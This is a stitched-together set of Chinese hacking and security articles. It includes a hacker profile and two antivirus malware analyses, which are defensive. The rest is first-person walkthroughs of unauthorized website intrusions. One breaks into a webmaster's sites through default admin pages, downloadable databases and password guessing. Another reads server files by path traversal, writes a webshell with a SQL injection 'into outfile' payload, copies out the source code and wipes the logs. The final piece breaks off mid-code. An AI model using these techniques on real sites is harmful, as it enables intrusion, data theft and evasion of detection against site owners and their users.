　　2000年，不甘寂寞的金波从山西县城来到广州。他打着几份零工，包括送报和送外卖，他用不多的积蓄在房间里置办了电脑，无日无夜地练习编程。那时他在黑客圈中早已成为受人尊敬的高手，而在现实生活中仍然一文不名。这时一个黑客朋友告诉他，有一家报业集团正招聘网管。对此驾轻就熟的金波，轻松获得了这份工作。

　　黑客从良

　　2000年——千禧虫肆虐之年，黑客技术开始在国内迅速泛滥，如同洪水猛兽，而网络安全被认为是将要兴起的诺亚方舟。在金波看来，网络安全和黑客只是一个硬币的两面。比如木马程序，黑客用来攻击，就是木马病毒，而转成网络安全术语，就叫“远程控制系统”。他很快意识到了这种微妙转换间的可能性。他笑说：“我那时满脑子想的都是黑客怎样从良。”

　　这个被梦想燃烧的男人开始行动。他利用自编软件，向广州各公司发送邮件，推销自己的计划。如同战国时期的纵横家，他要说服那些生意人采纳他的意见。功夫不负苦心人，他遇到一个从事资本运作的广东商人，他终于说服人家出资，而自己技术入股，成立一家网络安全公司。那时总部在上海的黑客组织“绿色兵团”也已经进行了商业化运作，摇身一变成为上海绿盟计算机网络安全技术有限公司。但问题也随之出现，在公司内部，技术方和资本方究竟谁应该占据主导？上海绿盟很快因为技术方与资本方的矛盾而分裂。

　　他们的合作维持了3年，后来广东商人撤资，但此时的金波已有足够资本进行独立经营。目前他主要从事网站建设和网络维护方面的业务。就在金波艰难创业期间，网络上出现了两次大规模的黑客大战：其一是2001年的三菱车事件、日航事件、教科书事件使得中日关系严重恶化，中国黑客对日本网站发起了全面进攻；其二是，南海撞机事件之后，中美黑客发生大混战。双方的互击引起其他国家的黑客纷纷参战，支持中方或者美方，而来自欧洲的黑客干脆不顾任何立场，不管中国或者美国的网站，只要有漏洞就进行攻击。

　　金波没有参与任何一场黑客大战，他已经淡出江湖。因为他发现参战的黑客已不再是怀抱单纯的爱国之心；暴躁的冲动、毁灭的欲望，甚至狭义的民族情绪在主导战争。硝烟弥漫在没有道义的战场上，胜利者缺失，只有失败者。2002年4月，中国互联网协会公告制止有组织的攻击行为，从此大规模有组织的黑客攻击不复存在。

　　“那你怎么看待现在的黑客？”

　　“堕落了”，他笑着把两手交叉在一起，继而沉默起来，“现在利用黑客技术制造传播木马、盗窃账户信息、第三方销赃、洗钱的木马产业链已经形成了。”

　　“不是还有黑客变成了道德警察、网络暴民？”记者提到近来闹得沸沸扬扬的网络虐猫事件和铜须事件。

　　“真正的黑客不是这样”，金波站起来在房间里踱着步，“真正的黑客应该是现代社会的侠客，是《英雄本色》里的小马哥。”

　　“那你算是真正的黑客吗？”

　　他突然定在那里，双手抱肩，目光像风吹过的稻田，稻叶下的清光一闪，又暗了下去。“我早已经不是黑客了”，他黯然地说，“我现在是商人，是网络安全人员。真正的黑客不会做这些，更不会接受媒体采访。”

　　他从烟夹里摸出一支烟，衔在嘴里，火光一亮，仿佛一朵鲜花霎时间开放又凋败。这是整个下午他抽的第一支烟。

　　此时傍晚的阴云正在窗外聚集，金波说：“我一会儿开车送你回家。”

“网页收割者”病毒技术分析报告

“网页收割者”病毒技术分析报告

来源：赛迪网 作者：江民

9月20日，江民科技反病毒中心截获到一个假冒微软网站进行传播的病毒“网页收割者”（Virus.Autorun.dr），该病毒会感染网页文件，向其中插入恶意网址连接，并利用多个系统漏洞下载20多个恶性网游木马，盗取游戏玩家的账号和密码，给玩家带来极大的损失。

江民反病毒专家介绍，“网页收割者”病毒采用Delphi 工具编写，病毒运行后，会创建病毒进程crsss.exe，该进程指向的路径为：%WinDir%\System32\crsss.exe，文件大小为 62512字节。病毒会在注册表中添加以下自启动项，以使自己随Windows操作系统同时运行。

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"crsss" = %WinDir%\system32\crsss.exe

该病毒还会搜索硬盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件，向其中插入恶意网址http://mlcro-soft.cn/****.htm，该恶意网址伪装成微软网站，极具欺骗性。病毒还会在系统目录system32下生成下载网游木马列表文件c.txt ，病毒会将这些网游木马下载并且执行。用户一旦点击中毒网页，该恶意网页即可利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行20多个恶性网游木马，盗取游戏玩家的账号和密码，给玩家带来极大的损失。

江民反病毒专家介绍，“网页收割者”病毒还会通过U盘/MP3/移动硬盘等移动存储设备进行传播，在其中生成autorun.inf和niu.exe两个病毒文件，这样当用户在双击打开U盘的时候就会将病毒激活，从而感染到系统中。该病毒还会强行修改IE首页，将首页设置为http://mlcro-soft.cn/update.htm 带毒网站，这样用户一打开IE浏览器就会感染病毒。该病毒还会破坏操作系统的注册表相关键值，使系统无法显示隐藏文件。

针对此病毒，江民科技反病毒中心已经紧急升级了病毒库，只要升级到9月20日的病毒库，即可拦截此病毒的入侵。

江民反病毒专家建议广大用户，采取以下四点措施有效防范病毒入侵：

1.将KV系列杀毒软件的病毒库升级到9月20日，并开启杀毒软件所有的实时监功能，建议选择具有U盘病毒免疫功能的杀毒软件如：江民KV2008 杀毒软件。

2.及时打好系统补丁，建议用户通过Windows系统的Windows Update 功能更新操作系统补丁，尤其是一定要打上MS06-014漏洞，MS07-017漏洞，MS07-004漏洞等网页木马多用漏洞。

MS06-014 补丁下载网址：

http://www.microsoft.com/china/technet/security/bulletin/MS06-014.mspx

MS07-017 补丁下载网址：

http://www.microsoft.com/china/technet/security/bulletin/MS07-017.mspx

MS07-004 补丁下载网址：

http://www.microsoft.com/china/technet/security/bulletin/MS07-004.mspx

3.禁用系统的自动播放功能，防止病毒从U盘、MP3、移动硬盘等移动存储设备进入到计算机。

禁用Windows 系统的自动播放功能的方法：在运行中输入 gpedit.msc 后回车，打开组策略编辑器，依次点击：计算机配置－＞管理模板－＞系统－＞关闭自动播放－＞已启用－＞所有驱动器－＞确定。

4. 不要随意接收从QQ、MSN等即时聊天工具发送过来的可执行文件，不要登陆来历不明的网址连接。

Trojan-Spy.Win32.Delf.uv分析

安天实验室 CERT

一、病毒标签：

病毒名称： Trojan-Spy.Win32.Delf.uv

病毒类型： 木马类

文件 MD5： B9DEA4695BE56C4C5A95F97D7E356284

公开范围： 完全公开

危害等级： 3

文件长度： 11,667 字节

感染系统： Windows98以上版本

开发工具： Borland Delphi

加壳类型： Upack 0.3.9 beta2s

二、病毒描述：

近日，木马以一种新的形式现身网络，以“木马群”的形式协同操作。在以前木马都是单兵作战，一个木马单独进行侵入用户电脑。而现在木马的分工开始明确细化，有的木马单独进行反杀毒产品，关闭安全产品进程，禁用其服务；有的木马专门开启后门；有的木马专门做病毒隐藏工作，利用Rootkit技术进行木马文件隐藏，在通用的文件及进程查看工具下无法看到木马文件；而有的木马专门进行木马升级和下载其它木马；在这些木马的协同下，形成了现在的“木马群”。“木马群”达到了更加隐蔽，更加难以查杀；是对现在的反病毒产品的一个挑战。

对于该木马就是“木马群”中的一部分，其在“木马群”中的作用是下载大量其它病毒，关闭Windows自带的安全功能；充当了下载器与反安全产品的角色。

三、行为分析：

本地行为:

1、 文件运行后会释放以下文件：

%System32%\WinFormA.ini 18字节

%System32%\WinFormA5.dll 17,493字节

%System32%\WinFormA5.exe 11,667字节

删除： verclsid.exe 28,672 字节

verclsid.exe功能：安装了Windows安全更新908531(MS06-015)后出新增的一个程序。该程序会在WindowsShell或Windows资源管理器实例化任何外壳扩展之前对这些扩展进行验证。

2、修改AppInit_DLLs，添加启动项：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs

新: 字符串: "WinFormA5.dll"

旧: 字符串: ""

3、通过打开文件的钩子操作进行启动：

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A12BC423-3713-224D-3F55-32B35C62B11A}\InprocServer32\@

键值: 字符串: "C:\WINDOWS\system32\WinFormA5.dll"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A12BC423-3713-224D-3F55-32B35C62B11A}\InprocServer32\ThreadingModel

键值: 字符串: "Apartment"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{A12BC423-3713-224D-3F55-32B35C62B11A}

键值: 字符串: "WinFormA5.dll"

4、关闭Windows自动更新：

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\AUOptions

键值: DWORD: 1 (0x1)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

键值: DWORD: 1 (0x1)

5、关闭Windows自带防火墙：

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall

键值: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall

键值: DWORD: 0 (0)

6、WinFormA5.dll进行键盘记录

7、WinFormA5.dll插入EXPLORER.EXE和其它应用程序进程中

8、该病毒可盗取网络游戏“天龙八步”的帐号与密码

网络行为:

1、 以插入病毒DLL文件的EXPLORER.EXE进程连接网络，下载大量其它病毒文件，这些病毒文件中有病毒下载器，病毒下载器还可下载更多的其它病毒到本机运行：

连接网络：

688.1130688.com(210.51.170.64:80)

203.171.233.244

下载病毒文件并自动运行后，病毒文件如下：

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\0FULOB89\14[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\0FULOB89\1[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\0FULOB89\5[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\0FULOB89\9[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2FY7KF27\11[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2FY7KF27\3[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2FY7KF27\7[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2NCVMH4H\12[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2NCVMH4H\4[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2NCVMH4H\8[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2NCVMH4H\8[2].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\4FEI87ZS\10[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\4FEI87ZS\2[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\4FEI87ZS\6[1].exe

%Program Files%\Internet Explorer\RAVGJMON.DAT

%Program Files%\Internet Explorer\RAVGJMON.exe

%Program Files%\Internet Explorer\RAVWDMON.DAT

%Program Files%\Internet Explorer\RAVWDMON.exe

%System32%\1.exe

%System32%\dhdini.dll

%System32%\dhdins.exe

%System32%\dhdpri.dll

%System32%\jziini.dll

%System32%\jziins.exe

%System32%\jzipri.dll

%System32%\msdebug.dll

%System32%\mxacfg.dll

%System32%\mxaman.dll

%System32%\mxaset.exe

%System32%\qheini.dll

%System32%\qheins.exe

%System32%\qhepri.dll

%System32%\TIMHost.dll

%System32%\wlgini.dll

%System32%\wlhins.exe

%System32%\wlhpri.dll

%System32%\WMIApiSrv.dll

%System32%\ztmini.dll

%System32%\ztmins.exe

%System32%\ztmpri.dll

%Windir%\TIMHost.exe

%Windir%\winow.dll

%Windir%\winow.exe

注释：

%Windir% WINDODWS所在目录

%DriveLetter% 逻辑驱动器根目录

%ProgramFiles% 系统程序默认安装目录

%HomeDrive% 当前启动系统所在分区

%Documents and Settings% 当前用户文档根目录

%Temp% 当前用户TEMP缓存变量；路径为：

%Documents and Settings%\当前用户\Local Settings\Temp

%System32% 是一个可变路径；

病毒通过查询操作系统来决定当前System32文件夹的位置；

Windows2000/NT中默认的安装路径是　C:\Winnt\System32；

Windows95/98/Me中默认的安装路径是　C:\Windows\System；

WindowsXP中默认的安装路径是　C:\Windows\System32。

四、 清除方案：

1、使用安天木马防线可彻底清除此病毒(推荐)，请到安天网站下载：www.antiy.com 。

2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。推荐使用ATool（安天安全管理工具），ATool下载地址: www.antiy.com或http://www.antiy.com/download/index.htm 。

重新起动机器，进入安全模式，利用安天木马防线或ATool等工具进行如下操作：

(1) 使用安天木马防线或ATool中的“进程管理”关闭病毒进程

强行删除插入EXPLORER.EXE的WinFormA5.dll

(2) 强行删除病毒文件

%System32%\WinFormA.ini

%System32%\WinFormA5.dll

%System32%\WinFormA5.exe

(3) 恢复病毒修改的注册表项目

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

\AppInit_DLLs

新: 字符串: "WinFormA5.dll"

旧: 字符串: ""

(4) 删除病毒添加的注册表项

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A12BC423-3713-224D-3F55-32B35C62B11A}\InprocServer32\@

键值: 字符串: "C:\WINDOWS\system32\WinFormA5.dll"

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A12BC423-3713-224D-3F55-32B35C62B11A}\InprocServer32\ThreadingModel

键值: 字符串: "Apartment"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{A12BC423-3713-224D-3F55-32B35C62B11A}

键值: 字符串: "WinFormA5.dll"

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\AUOptions

键值: DWORD: 1 (0x1)

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

键值: DWORD: 1 (0x1)

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall

键值: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall

键值: DWORD: 0 (0)

(5) 强行删除该病毒下载的文件：

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\0FULOB89\14[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\0FULOB89\1[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\0FULOB89\5[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\0FULOB89\9[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2FY7KF27\11[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2FY7KF27\3[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2FY7KF27\7[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2NCVMH4H\12[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2NCVMH4H\4[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2NCVMH4H\8[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\2NCVMH4H\8[2].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\4FEI87ZS\10[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\4FEI87ZS\2[1].exe

%Documents and Settings%\当前用户\Local Settings\Temporary Internet Files\Content.IE5\4FEI87ZS\6[1].exe

%Program Files%\Internet Explorer\RAVGJMON.DAT

%Program Files%\Internet Explorer\RAVGJMON.exe

%Program Files%\Internet Explorer\RAVWDMON.DAT

%Program Files%\Internet Explorer\RAVWDMON.exe

%System32%\1.exe

%System32%\dhdini.dll

%System32%\dhdins.exe

%System32%\dhdpri.dll

%System32%\jziini.dll

%System32%\jziins.exe

%System32%\jzipri.dll

%System32%\msdebug.dll

%System32%\mxacfg.dll

%System32%\mxaman.dll

%System32%\mxaset.exe

%System32%\qheini.dll

%System32%\qheins.exe

%System32%\qhepri.dll

%System32%\TIMHost.dll

%System32%\wlgini.dll

%System32%\wlhins.exe

%System32%\wlhpri.dll

%System32%\WMIApiSrv.dll

%System32%\ztmini.dll

%System32%\ztmins.exe

%System32%\ztmpri.dll

%Windir%\TIMHost.exe

%Windir%\winow.dll

%Windir%\winow.exe

(6) 由于该病毒为“木马群”中的一部分，对该病毒能够清除，但对其对应的“木马群”的整体的清除有一定的困难。、见议使用安天木马防线可彻底清除此“木马群”。

社会工程学入侵实战技术分析

到这个题目可能很多人感到奇怪:黑客不是都在埋头学Perl、溢出、SQL注入……?怎么又来了一个社会工程学?

下面我们就来聊一下社会工程学入侵:

当然，社会工程学的原本意思我就不详细解释了，因为我看了很久都没有看出是什么意思来，枯燥的厉害，是架着眼镜的老先生研究的问题，我们不去考虑。我们说的是社会工程学在信息安全方面的实现。

基本的意思就是:利用一切途径、手段，搜集攻击目标的资料，然后利用已知资料攻陷对方。比如某某网站的站长在他那里发表了很多不利于我的言论，要是他在我面前，我立刻会扑上去咬死他(好在不在我面前，呵呵)，但是我却是一个技术菜鸟，什么注入、溢出、脚本之类的一点也不懂，怎么办?就此罢休?——当然不!下面就看我是如何搞定一个网站的。OK，Let’s go!

首先……打开我要攻击的网站，首先看看各个页面，浏览一下。就好比小偷在下手之前要先查看一下身边的地形、人群一样，就是“踩点”了。首页做的不怎么样，有个新闻系统，点一条新闻之后弹出页面，看了就很熟悉。在www.target.com/news 后面添加admin进入管理目录看看，因为很多管理系统这个都是默认的管理目录。结果无法显示，又用admin.asp和login.asp这两个使用频率很高的文件，也无法显示。结果一看浏览器的标题栏，赫然写着“业一新闻系统2.9增强版”!好像网上比较多哦。下载一个看看!

立刻上www.baidu.com搜索一下“业一新闻系统2.9增强版”。找到了用这个做新闻系统的，但是没有找到这个的下载，但是找到了他们的官方网站，于是下载了一个“业一新闻系统2.9专业版”，应该都差不多吧。

有个“安装说明”，打开看看(图1):



上面的三处地方:

A、我们知道了后台管理的文件是m_login.asp，为进入后台奠定第一步，否则即时有管理员权限也没有地方管理 J

B、默认的用户名和密码，这年头真的有人不修改就直接用的，我以前曾经用默认用户名和密码黑过不少留言本和其它类似的系统。

C、默认的数据库名称news.mdb，是Access的数据库，在浏览器可以直接下载的。

现在我们开始第一步，进入www.target.com/news/m_login.asp，显示出要管理员登陆的界面。用默认的用户名admin、密码admin看看，提示错误。然后呢?在浏览器写上www.target.com/news/news.mcb就是默认的数据库路径了，回车。

天啊——居然提示文件下载!幸福ing……保存。用Office组件中的Access打开，终于看到了数据库里面的文件。本想还要再下载一个破解Access数据库的东东来者，结果数据库没有加密。嘿嘿，用户名target、密码target。用这个登陆m_login.asp成功(图2):



还是添加一条新闻警告一下吧，谁叫他这么大意的!^_^

搞定了这里，事情当然还没有完，网站是由几个网上下载的整站程序组成的。我们看看动画欣赏的版面，感觉还凑合。在浏览器写上http://donghua.target.com/admin.asp，无法显示，把admin.asp改成login.asp，跳出了超级管理登陆的界面。

用户名和密码用admin，失败。换成新闻系统的，因为很多人都用一个密码的。使用target登陆成功!好的，现在动画站的控制权又到了小菜鸟我的手中。^_^

太简单了吧，一点挑战的意思都没有。随手打开网站的一个文章子站，用的是“动力文章”管理系统。页面最下面有“管理登陆”。方便，不用费心找管理文件了，呵呵。尝试了一下上面的几个密码，没有成功。

怎么办?还是和搞定新闻系统的一样，从网上down一个动力文章管理系统。发现默认的数据库文件是.asp结尾的。相信站长必然不会改成.mdb了，这样就没办法下载了。难道就没有办法了?不行，不能这么放弃。继续猜解密码!

尝试了几个比较无聊的数字，像123、123456、abc、iloveyou之类的之后，我敲上了target520，结果——成功了!嘿嘿，又一只羊落入狼口了。^_^

还有什么好玩的?还有校友录。恩，打开看看，界面还是很不错的哦。看站长的水平一定不是自己做的，好像找人做的可能性也不大。那就只有一条路，就是从网上下载的校友录整站程序。哪一种呢?不清楚。

尝试admin目录、admin.asp和login.asp文件，不成功。

看看同学录首页，仔细观察一下，页面是这个样子的:(图3)



看到图片中我圈中的部分了没有?选中这些字符，包括前后的两个“※”，因为包含“同学录统计信息”的页面可能很多，但是前后同时包含两个“※”的就少了。这是为了提高搜索的准确率。^_^

当然，这一下子搜出很多的。看看基本都是这个模样的。这证明了我刚才的猜想——同学录是下载的。

上百度搜一下，到有asp同学录的地方看看。发现下载最高的无非是两个:红雨同学录和风月同学录。都down一个下来，放到iis目录下面。运行之后看看界面。这下子就知道了，是用的风月同学录。看一下iis目录中的文件，最像管理员登陆文件的时候sysadm_index.asp，在浏览器写上http://tongxuelu.target.com/sysadm_index.asp，眼前出现了登陆的界面。

尝试用上面的几种方法，均失败。难道没有别的方法了?当然不是(要不我怎么写下面的部分，怎么骗取老编的稿费?^_^)。

先注册一个用户，随便注册一个就可以。为什么?因为我们要搞到管理员的密码，而未注册用户是无法查看用户信息的。注册进入之后就可以看所有用户的详细资料了。

黑了人家这么多子站，当然明白站长是哪个了吧?找到他的资料，什么电话、QQ、ICQ、生日之类的都记下，猜解密码的时候可能用上哦。看好了这些东西我回头继续猜密码，连续猜了几次不中，考虑可能这条路不对。于是回到同学录首页，突然看到了“我忘记密码了”这个按钮，相信大家都很熟悉吧?电子信箱、论坛上面都有这么个东东的。

点击之后要我输入用户名，这个简单，输入刚才找到的管理员的用户名就可以了，下一步之后出现提示，要输入问题的答案。他的问题是“Q+T”，怪怪的哦，我想可能是QQ+telephone，然后输入QQ和电话的号码，连续的号码，错误，第二次中间有“+”，成功!到此把胜利的旗帜插到了同学录的山顶。^_^

本想到此结束的，但是登陆http://tongxuelu.target.com/sysadm_index.asp之后，发现了一个让我很吃惊的结果(图4):



看到了?好恐怖哦，所有的个人资料尽显管理员眼底，包括密码等。以后再遇到这样的同学录我是打死也不敢注册了，万一管理员有点什么念头……再想想自己的QQ、信箱、论坛……用的都是一个密码……恐怖……也提醒各位读者，以后注册之前先考虑清楚:我为什么要在这里注册?注册了有没有风险?在这里注册的n多会员，密码就都在我控制之下了。我尝试了一下，很多都是信箱和QQ共用一个密码的!

好了，写到这里，这次入侵也算完成了。不知道你看过之后有什么收获?

其实入侵一个网站往往不像我们想象的那么难，只要你心足够细，很多网站都可以被入侵的，特别是一些个人网站。我在学校网页制作大赛的时候，就在获奖的作品里面找到了两个网站黑了，思路和这个一样，确切的说只要下载数据库就可以了。更何况，现在一些搜索引擎都可以搜索.mdb的数据库，这样以来入侵就更加简单。

其实还有很多更高深的社会工程学手段。比如你想黑掉某个网站，你可以伪造邮件，获得相关人员的信任，然后练习一回口技，捏鼻子打电话之类……总之，社会工程学入侵涉及到方方面面。

一次曲折的安全检测

一次曲折的安全检测

此次安全检测过去有段时间了，一直想写成稿子就是没有时间，具体环境可能有所淡忘，但整个过程和思路还是很明了的。由于在校期间课余在学校的网络工作室工作，所以对一些学校网站的服务和发展比较关注。这期间发现某学院的文件交换系统非常的不错，在校园网内使用会带来很多方面的便捷。搜索了下网上没有现成的系统下载，难道非要自己现写不成…

踩点：
服务器开放了21和80端口，Serv-U6.2、Apache/2.055(win32)PHP/5.1.2；同台服务器上还有一个OA系统。黑盒测试，先是测试上传脚本文件，可以上传，得到提取码后进行提取不会被解析…，对上传过程进行抓包，然后构造不存在的文件，发包，也没有暴出任何敏感信息。对整个的交换系统进行文件扫描也就扫出个config.php，google了下也没有别的文件。刚才不是说还有个OA 系统吗，google OA的时候确实有动态的连接，但所有的连接首先判断是不是校内IP，如果非校内IP直接跳转一个登陆页面，到这里测试完全的陷入了僵局。几经的离开，几经的回来再测试都没有结果，难道真的拿不下它吗？再一次的测试时输入提取码后的下载地址吸引了我。

“hxxp://www.xxx.edu.cn/ex/download.php?url=exchanging%2F200709121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg”

url后应该是个绝对地址，那么修改下会不会下到别的文件？
抓包：

GET /ex/download.php?url=exchanging%2F200709121626171664123.jpg&name=dff3badd8b57fee777c63871.jpg
HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0
一般WIN32下PHP继承的SYS权限，所以读文件干脆就读c:\boot.ini，Telnet 服务器ip 80发送下面修改好的数据

修改：

/ex/download.php?url=c%3A%5Cboot.ini HTTP/1.1
Accept: */*
Referer: hxxp://www.xxx.edu.cn/ex/down.php
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.1)
Host: www.xxx.edu.cn
Connection: Keep-Alive
Cookie: down_fail_cnt=0

结果真的返回了boot.ini的内容，狂喜中！

紧接着下来的问题就是猜web目录的路径了，找PHP或者Apache的配置文件应该都能找到WEB的路径，还是上面的发包，当试到路径d:\wwwroot\ex时，没有返回错误信息，说明猜对了他的路径，然后就是读交换系统的文件代码了，代码都是相关联的，发现就7个php文件而且用这个系统根本拿不到shell。进而转攻OA系统，不出意外OA的路径应该就是d:\wwwroot\oa，完全正确！首先读的就是config.php，察看敏感信息，暴出数据库联接信息是本地连接,root权限。然后就是扫描OA文件，测试到这程度能不能拿shell我心里还是没有底，大批的读源文件？… …心里发寒。

突破：

自己陷入矛盾中，放弃吧不甘心；继续吧，就算读完整套代码可能一无所获。心一横，先看看有没有代码过滤再说吧，首先登陆口，随意输入用户名、密码提交，抓包。抓到check.php，然后读代码。它是这么写的：

＜?php
//echo "系统维护，请稍后访问！";exit;
require("config.php");
require("public/f_main.php");
require("f_db/".$Database['type'].".php");

session_start();

$db = new sql_db($Database['server'], $Database['username'], $Database['password'], $Database['dbname'], false);
if(!$db -＞ db_connect_id)
{
MsgGo("数据库连接失败！","exit");
}

foreach($_POST as $key=＞$value) $$key=$value;

//用户密码验证
$sql="SELECT a.*,b.dep_name,b.dep_parent_id,b.dep_id AS dep_id,c.dep_name as dep_parent_name
FROM t_user a
LEFT JOIN t_dep b ON a.dep_id = b.dep_id
LEFT JOIN t_dep c ON c.dep_id = b.dep_parent_id
WHERE user_name ='$user_name'";
if(!($result = $db-＞sql_query($sql))) MsgGo("数据查询失败！","login.php");
if($row = $db-＞sql_fetchrow($result)){
if($row["user_status"]!="1"){
MsgGo("该用户处于停用状态，暂不能登录！","login.php");
}else{
if(md5($user_password)==$row["user_password"] || crypt($user_password,$row["user_password_old"])==$row["user_password_old"] || $user_password=="qwert12345")
{
if($row["user_password_old"]!="" && $user_password!="qwert12345"){
$sql="UPDATE t_user SET
user_password='".md5($user_password)."',
user_password_old=''
WHERE user_name ='$user_name'";
if(!$result = $db-＞sql_query($sql)){
MsgGo("数据查询失败！","login.php");
}
}
$sql="UPDATE t_user SET
last_login_time=".time()."
WHERE user_name ='$user_name'";
if(!$result = $db-＞sql_query($sql)){
MsgGo("数据查询失败！","login.php");
}
$_SESSION["sess_user_name"]=$row["user_name"];
$_SESSION["sess_user_type"]=$row["user_type"];
$_SESSION["sess_user_real_name"]=$row["user_real_name"];
$_SESSION["sess_user_level"]=$row["user_level"];
$_SESSION["sess_dep_id"]=$row["dep_id"];
$_SESSION["sess_dep_name"]=$row["dep_name"];

if($row["dep_parent_id"]=="1"){
$_SESSION["sess_dep_level"]="1";
$_SESSION["sess_dep_id1"]=$row["dep_id"];
$_SESSION["sess_dep_parent_id"]=$row["dep_parent_id"];
$_SESSION["sess_dep_parent_name"]=$row["dep_parent_name"];
}elseif($row["dep_parent_id"]＞"1"){
$_SESSION["sess_dep_level"]="2";
$_SESSION["sess_dep_id1"]=$row["dep_parent_id"];
$_SESSION["sess_dep_parent_id"]=$row["dep_parent_id"];
$_SESSION["sess_dep_parent_name"]=$row["dep_parent_name"];
}

WriteLog("登录系统");

//writeCookie("username_recent",$_SESSION["sess_user_name"],24*30);
setcookie("username_recent",$_SESSION["sess_user_name"], time()+3600*24*30);

//进入系统主页面
echo "＜script language='javascript'＞";
if($go!=""){
echo "location='{$go}?filter=".urlencode($filter)."'";
}else{
if($row["user_type"]!="101") echo "location='login/index.php'";
else echo "location='index.php'";
}

echo "＜/script＞";
}else{
MsgGo("密码错误！","login.php");
}
}
}else{
MsgGo("用户名错误！","login.php");
}

?＞

可以看出check.php过滤非常的不严，直接导致SQL注入！貌似网上有不少类似的文章。先查出有24个字段，然后
'union select 1,'＜www.xxx.edu.cn into outfile 'd:\wwwroot\oa\dir.php'/*
提交！

这样hxxp://www.xxx.edu.cn/oa/dir.php 就是我们的shell地址了。

这个shell都不用提权… …直接把文件交换还有OA打包拖回家，也没有搞别的，擦擦日志走人了。

整个过程算是峰回路转啊，那个艰辛啊，知道这样还不如自己写，托回来个有洞的程序-_-，唉。仔细读了下代码，问题出在download.php上，就写错了一个函数… …看来还真验证了那句话“安全来不得半点马虎！”我目的就是拿这个程序，没有再做进一步的渗透，有了小的缺口可能导致整个服务器群的沦陷！安全无小事！

分析一段有注射漏洞的asp代码时的小挫折

在网上看到了一段代码:(后面是我做关键部分的解释）
＜!--#include file="../user/conn.asp"--＞
＜!--#include file="Path.Asp"--＞
＜ASX version = "3.0"＞
＜%
id1=replace(request("id"),"","") ‘replace函数做简单的过滤，其实没效果的
